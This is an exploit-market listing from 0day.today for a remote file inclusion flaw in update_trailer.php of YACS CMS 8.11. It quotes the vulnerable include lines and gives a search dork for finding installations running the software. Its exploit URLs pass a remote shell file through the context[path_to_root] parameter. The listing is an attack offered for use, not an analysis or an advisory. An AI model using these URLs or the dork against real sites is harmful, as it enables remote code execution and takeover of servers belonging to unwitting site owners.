[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

YACS CMS 8.11 update_trailer.php Remote File Inclusion Vulnerability

Author
ahmadbady
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4860
Category
web applications
Date add
16-02-2009
Platform
unsorted
====================================================================
YACS CMS 8.11 update_trailer.php Remote File Inclusion Vulnerability
====================================================================


         -----------------[remote file include]-----------------

script: YACS version 8.11
   
------------------------------------------------------------------

download from: http://www.yetanothercommunitysystem.com/file-fetch/814-20081130-yacs-8.11rc30.zip
   

==============================================
vul: /yacs/scripts/update_trailer.php line 21 23 25;


include_once $context['path_to_root'].'shared/safe.php'; 21
if(!class_exists('i18n'))
 include_once $context['path_to_root'].'i18n/i18n.php'; 23
if(!class_exists('SQL'))
include_once $context['path_to_root'].'shared/sql.php'; 25



==============================================

dork: "Powered by yacs"
----------------------------------------------

xpl:

http://127.0.0.1/path/yacs/scripts/update_trailer.php?context[path_to_root]=[shell.txt?]

http://127.0.0.1/yacs/scripts/update_trailer.php?context[path_to_root]=[shell.txt?]

***************************************************
***************************************************

from[iran]
---------------------------------------------------



#  0day.today [2024-12-27]  #